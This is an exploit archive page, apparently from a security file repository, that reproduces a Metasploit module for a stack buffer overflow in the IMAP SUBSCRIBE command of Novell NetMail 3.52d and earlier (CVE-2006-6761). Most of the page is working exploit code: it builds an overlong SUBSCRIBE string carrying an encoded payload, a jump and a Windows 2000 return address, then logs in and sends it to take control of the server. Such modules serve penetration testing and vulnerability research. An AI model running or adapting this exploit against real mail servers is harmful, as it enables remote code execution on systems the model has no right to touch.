Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow

Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow: Posted Oct 30, 2009; Authored by MC | Site metasploit.com; This Metasploit module exploits a stack overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.; tags | exploit, overflow, imap; advisories | CVE-2006-6761; SHA-256 | 4f3a51860649cb4cf74cf0fc0cb120be7c093bb1528c86e2aeecca4de2ca9ae8; Download | Favorite | View

Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Imap

  def initialize(info = {})
    super(update_info(info,  
      'Name'           => 'Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE
        verb. By sending an overly long string, an attacker can overwrite the
        buffer and control program execution.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2006-6761' ],
          [ 'OSVDB', '31360' ],
          [ 'BID', '21728' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=454' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        => 
        [
          ['Windows 2000 SP0-SP4 English',    { 'Ret' => 0x75022ac4 }],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 23 2006'))

  end
  
  def exploit
    sploit =  "a002 SUBSCRIBE #" + rand_text_english(1602) + payload.encoded  
    sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V')  
    sploit <<  [0xe8, -485].pack('CV') + rand_text_english(150)  
  
    info = connect_login

    if (info == true)
      print_status("Trying target #{target.name}...")
      sock.put(sploit + "\r\n")
    else
      print_status("Not falling through with exploit")
    end
  
    handler
    disconnect
  end

end

Top Authors In Last 30 Days

Red Hat 145 files
Ubuntu 108 files
Debian 16 files
Rafael Pedrero 11 files
LiquidWorm 10 files
Google Security Research 9 files
Apple 9 files
Abdulhakim Oner 8 files
nu11secur1ty 8 files
Hubert Wojciechowski 6 files

File Archives

Systems

AIX (426)
Apple (1,960)
BSD (372)
CentOS (56)
Cisco (1,919)
Debian (6,714)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,288)
HPUX (878)
iOS (340)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,137)
Mac OS X (684)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (12,925)
Slackware (941)
Solaris (1,609)
SUSE (1,444)
Ubuntu (8,453)
UNIX (9,208)
UnixWare (185)
Windows (6,532)
Other

Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow

Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow

Share This

Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow

File Archive:

March 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems